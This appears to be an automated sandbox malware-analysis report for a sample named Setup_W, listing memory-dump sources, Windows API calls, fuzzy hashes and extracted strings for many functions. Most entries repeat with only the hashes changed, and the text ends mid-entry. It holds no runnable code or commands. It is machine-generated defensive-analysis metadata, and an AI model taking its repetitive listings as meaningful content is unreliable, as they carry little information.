Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: d4ce6788a16016415d95563c1a5f72ef11e1afc421299125907f954b73946493
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FA7 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 894d9e19391c7671d5045d8304978958721384f8ea430e3b6d567a1afbd35767
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FB9 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 92b6e789aec27669b293b6c0be98687b4830d1ed129aaa0fc392377fbff5ffeb
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F83 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 9111fecaa2ca1a20a779fccf97fb1b66005629668a3d45a597bb29a7d75a2d6f
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F95 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: f771907b61be5a3dcdbd550293ad18c99fb24c9d8b1d696943ad1ab3ce83aa04
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 6460B169 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetClientRect.USER32 ref: 6460B188
ClientToScreen.USER32 ref: 6460B1A3
ClientToScreen.USER32 ref: 6460B1B7
ClipCursor.USER32 ref: 6460B1C7

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Client$Screen$ClipCursorRect
String ID:
API String ID: 327882252-0
Opcode ID: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
Instruction ID: de3967afa0118325527a500990337cf9830fa330cb0f33882166e8e8a5f9da13
Opcode Fuzzy Hash: 162a1efc762c65cbf26b615fccb4085475b686e5eaa3f8dd21bba7fef1701905
Instruction Fuzzy Hash: 7401C7B5508314DFDB10AFA9D98899ABBFCEF8D711F05846DF988D7206D770A440CB61

Function 64609F29 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 28stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 64609F42
strncpy.MSVCRT ref: 64609F5D
sprintf.MSVCRT ref: 64609F78

Strings

, xrefs: 64609F4E

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: sprintfstrcmpstrncpy
String ID:
API String ID: 3428612647-3916222277
Opcode ID: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
Instruction ID: 027aeb0801abcbd9981f36cb3dfc2850e8ec7fcfbd5dac22fc52f1f3b90d426a
Opcode Fuzzy Hash: 6f6045445ff9401ca04718910da4c7baab9fa4e349a2653e0bbe6209c7db91f3
Instruction Fuzzy Hash: 81F0D4B0809318ABD701EF65D5815DEFFF8EF58694F40881EE89897301E735D5448B97

Function 64608533 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32 ref: 646085C1
WideCharToMultiByte.KERNEL32 ref: 64608689

Strings

6ad, xrefs: 6460859B

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ByteCharMultiVirtualWide
String ID: 6ad
API String ID: 3828976821-1031825395
Opcode ID: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
Instruction ID: 24419a969d7d0daed1f4e42002e395fe619d61d3fe672e14837b8803912eadce
Opcode Fuzzy Hash: 8383c1e8cf737a5170c7d91abc13bcbd3d938c45e0974207f741a0ee60a6cb8d
Instruction Fuzzy Hash: 5D3148709087199FDB14DF19C94439AFBF4FF89714F00899DE4889B350D7769A898F82

Function 6460AF9B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32 ref: 6460AFC8
SetWindowPos.USER32 ref: 6460B009

Strings

(, xrefs: 6460AFAF

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: InfoMonitorWindow
String ID: (
API String ID: 1000336858-3887548279
Opcode ID: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
Instruction ID: 502e0767f41d8d433dddf24bc5cde6cf11d2560b46fb9b82cde7352b0b0e82d5
Opcode Fuzzy Hash: a9dc9575a43f2710632ea7e14083647647f16b44805017f0800d4cc3a24ca00e
Instruction Fuzzy Hash: 1501A975A08305DFCB04DFADD58899EBBF5FB88310F008929E958E7351E77499448F92

Function 6460A2C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetMonitorInfoW.USER32 ref: 6460A2F7
wcscmp.MSVCRT ref: 6460A313

Strings

h, xrefs: 6460A2E7

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: InfoMonitorwcscmp
String ID: h
API String ID: 2112724651-2439710439
Opcode ID: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
Instruction ID: f03be016e800082238e742283fde96a3313a8a764e9bcebccff95e88b6ecb0fc
Opcode Fuzzy Hash: 21d257595f40e48e7631c37dcd568436e83cb1d361751ab2fd3c41ed39c1d526
Instruction Fuzzy Hash: E4F044719042099BDB10DF99DD80ADEBBF8FF88754F00842AE994D7341D735D9149BA1

Function 009D3610 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

m->p= max= min= next= p->m= prev= span=% util%s[%d]%w: GT%w: IN%w: LT(...), i = , not , val .local.onion.reloc390625<-chanAnswerArabicAugustBrahmiCANCELCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOAWAYGetACPGothicHangulHatranHebrewHy, xrefs: 009D36CB
releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br, xrefs: 009D3761
p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLa, xrefs: 009D3717
releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB), xrefs: 009D36A9

Memory Dump Source

Source File: 00000000.00000002.2012483524.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true

Associated: 00000000.00000002.2012469084.0000000000990000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012633658.0000000000BE8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012633658.0000000000CBD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012788116.0000000000E57000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012802441.0000000000E60000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012844036.0000000000F03000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012855315.0000000000F05000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012866010.0000000000F06000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012876851.0000000000F07000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012888016.0000000000F08000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F0A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F33000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012899101.0000000000F37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012957027.0000000000F3A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012968805.0000000000F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2012968805.0000000000F5A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_990000_Setup_W.jbxd

Similarity

API ID:
String ID: m->p= max= min= next= p->m= prev= span=% util%s[%d]%w: GT%w: IN%w: LT(...), i = , not , val .local.onion.reloc390625<-chanAnswerArabicAugustBrahmiCANCELCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOAWAYGetACPGothicHangulHatranHebrewHy$ p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC)) at entry+, elemsize=, npages = -syncWithWU.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLa$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverabletimer data corruptiontrace/br$releasep: m=runtime: gp=runtime: sp=self-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstransmitfileunexpected )unknown portunknown typewintrust.dllwirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB)
API String ID: 0-4218688440
Opcode ID: fc84a1cf3818abafaec5a6adaadcb2ea32a635d51a3e00401860b47c05b78050
Instruction ID: cb7f48da65ee66720a741def776cf85c9036763e43d74cdaa3ef9bca6936aa30
Opcode Fuzzy Hash: fc84a1cf3818abafaec5a6adaadcb2ea32a635d51a3e00401860b47c05b78050
Instruction Fuzzy Hash: CD31F3B89087459FC304EF24C195B1EBBE4BF88705F41892DE8888B352DB35D988DB63

Function 64608385 Relevance: 5.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,6460C5CF), ref: 646083C2
calloc.MSVCRT ref: 646083EE
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6460841B
free.MSVCRT ref: 6460843B

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
String ID:
API String ID: 1537213191-0
Opcode ID: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
Instruction ID: 3fad4399fbb3fd9b921955e3d7d79b08c776be0bad752d566589edefa5aa6e19
Opcode Fuzzy Hash: d0d1b7259468c9eb3ef3627c52cb7e652abdd9263ed0db7c84578f0dd1257ab1
Instruction Fuzzy Hash: 7B11DAB05093019FD750EF69C68534EBFF4EF85768F009A2EE8D88B290D3B499448B93

Function 64610BA0 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 64610BAE
TlsGetValue.KERNEL32 ref: 64610BD5
GetLastError.KERNEL32 ref: 64610BDC
LeaveCriticalSection.KERNEL32 ref: 64610BFC

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
Instruction ID: ee5cbb80369ca3e531f180af7fda5c4d324b963a5661de7ff54391a54ec4a6e4
Opcode Fuzzy Hash: 692ab75c648c49dbaa32af2f6e0461e8d7d7f701c28018ed7cea0e5124da7ae0
Instruction Fuzzy Hash: B9F0FFB2908290CBDF11BFBEC88490A7BB4EA62348F015078DD4887204E630E918CBA3

Function 64603763 Relevance: 5.0, APIs: 4, Instructions: 27COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 64603776
free.MSVCRT ref: 64603781
free.MSVCRT ref: 6460378C
free.MSVCRT ref: 64603797

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
